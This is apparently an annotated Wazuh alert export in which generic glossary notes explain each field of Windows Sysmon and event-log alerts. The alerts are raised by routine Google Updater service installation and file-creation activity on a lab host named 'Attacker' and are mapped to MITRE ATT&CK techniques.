No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {555908d1-a6d7-4695-8e1e-26931d2012f4}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Service Control Manager
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  7045
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8080000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:32:37.8788463Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2985
Incremental log record number – handy for timeline order.

data.win.system.processID:  772
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  9712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "A service was installed in the system. Service Name: Google Updater Service (GoogleUpdaterService137.0.7129.0) Service File Name: "C:\Program Files (x86)\Google\GoogleUpdater\137.0.7129.0\updater.exe" --system --windows-service --service=update Service Type: user mode service Service Start Type: auto start Service Account: LocalSystem"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.serviceName:  Google Updater Service (GoogleUpdaterService137.0.7129.0)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.imagePath:  \"C:\\Program Files (x86)\\Google\\GoogleUpdater\\137.0.7129.0\\updater.exe\" --system --windows-service --service=update
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.serviceType:  user mode service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.startType:  auto start
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.accountName:  LocalSystem
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Software protection service scheduled successfully.

🧠 What happened? Software protection service scheduled successfully.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:33:59.203+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:33:59.203+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Software protection service scheduled successfully.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60642
Numeric ID of the detection rule that fired.

rule.firedtimes:  8
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_application']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534039.582303
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-SPP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Software Protection Platform Service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  16384
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x80000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:32:48.8829916Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2398
Incremental log record number – handy for timeline order.

data.win.system.processID:  7908
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Application
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Successfully scheduled Software Protection service for re-start at 2025-04-25T22:31:48Z. Reason: RulesEngine."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.data:  2025-04-25T22:31:48Z, RulesEngine
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:34:13.522+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:34:13.522+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534053.583882
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:40:58.6481860Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  225059
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:40:58.647 ProcessGuid: {94294ddc-50a3-6804-9f08-000000000e00} ProcessId: 12284 Image: C:\Program Files (x86)\Google\GoogleUpdater\137.0.7115.0\updater.exe TargetFilename: C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping12284_1175179416\UpdaterSetup.exe CreationUtcTime: 2025-04-20 01:40:58.647 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:40:58.647
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-50a3-6804-9f08-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12284
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Program Files (x86)\\Google\\GoogleUpdater\\137.0.7115.0\\updater.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\SystemTemp\\chrome_Unpacker_BeginUnzipping12284_1175179416\\UpdaterSetup.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:40:58.647
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  6
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:34:14.131+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:34:14.131+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534054.586712
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:40:59.0804559Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  225097
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:40:59.072 ProcessGuid: {94294ddc-50aa-6804-b308-000000000e00} ProcessId: 10268 Image: C:\WINDOWS\SystemTemp\chrome_Unpacker_BeginUnzipping12284_1175179416\UpdaterSetup.exe TargetFilename: C:\Windows\SystemTemp\Google10268_165626352\bin\uninstall.cmd CreationUtcTime: 2025-04-20 01:40:59.072 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:40:59.072
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-50aa-6804-b308-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10268
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\SystemTemp\\chrome_Unpacker_BeginUnzipping12284_1175179416\\UpdaterSetup.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\SystemTemp\\Google10268_165626352\\bin\\uninstall.cmd
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:40:59.072
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  6
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:34:14.164+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:34:14.164+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534054.589514
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:40:59.0805033Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  225099
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:40:59.074 ProcessGuid: {94294ddc-50aa-6804-b308-000000000e00} ProcessId: 10268 Image: C:\WINDOWS\SystemTemp\chrome_Unpacker_BeginUnzipping12284_1175179416\UpdaterSetup.exe TargetFilename: C:\Windows\SystemTemp\Google10268_165626352\bin\updater.exe CreationUtcTime: 2025-04-20 01:40:59.074 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:40:59.074
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-50aa-6804-b308-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10268
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\SystemTemp\\chrome_Unpacker_BeginUnzipping12284_1175179416\\UpdaterSetup.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\SystemTemp\\Google10268_165626352\\bin\\updater.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:40:59.074
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  6
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\GoogleUpdaterInternalService137.0.7129.0\\ImagePath binary is: \"C:\\Program Files (x86)\\Google\\GoogleUpdater\\137.0.7129.0\\updater.exe\" --system --windows-service --service=update-internal

🧠 What happened? Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\GoogleUpdaterInternalService137.0.7129.0\\ImagePath binary is: \"C:\\Program Files (x86)\\Google\\GoogleUpdater\\137.0.7129.0\\updater.exe\" --system --windows-service --service=update-internal

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:34:14.456+0000 | 🧠 MITRE: ['Persistence', 'Privilege Escalation'] – ['Windows Service'] [T1543.003]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1543.003

🔍 Full Alert Details
timestamp:  2025-04-24T22:34:14.456+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Evidence of new service creation found in registry under HKLM\System\CurrentControlSet\Services\GoogleUpdaterInternalService137.0.7129.0\ImagePath binary is: "C:\Program Files (x86)\Google\GoogleUpdater\137.0.7129.0\updater.exe" --system --windows-service --service=update-internal
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92307
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1543.003']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Persistence', 'Privilege Escalation']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Windows Service']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid13_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534054.592308
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  13
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  13
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:40:59.3171080Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  225118
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Registry value set: RuleName: - EventType: SetValue UtcTime: 2025-04-20 01:40:59.311 ProcessGuid: {94294ddc-ea7f-67fe-0b00-000000000e00} ProcessId: 772 Image: C:\WINDOWS\system32\services.exe TargetObject: HKLM\System\CurrentControlSet\Services\GoogleUpdaterInternalService137.0.7129.0\ImagePath Details: "C:\Program Files (x86)\Google\GoogleUpdater\137.0.7129.0\updater.exe" --system --windows-service --service=update-internal User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.eventType:  SetValue
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:40:59.311
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-ea7f-67fe-0b00-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  772
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\WINDOWS\system32\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetObject:  HKLM\System\CurrentControlSet\Services\GoogleUpdaterInternalService137.0.7129.0\ImagePath
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.details:  "C:\Program Files (x86)\Google\GoogleUpdater\137.0.7129.0\updater.exe" --system --windows-service --service=update-internal
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:34:17.160+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:34:17.160+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534057.595757
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
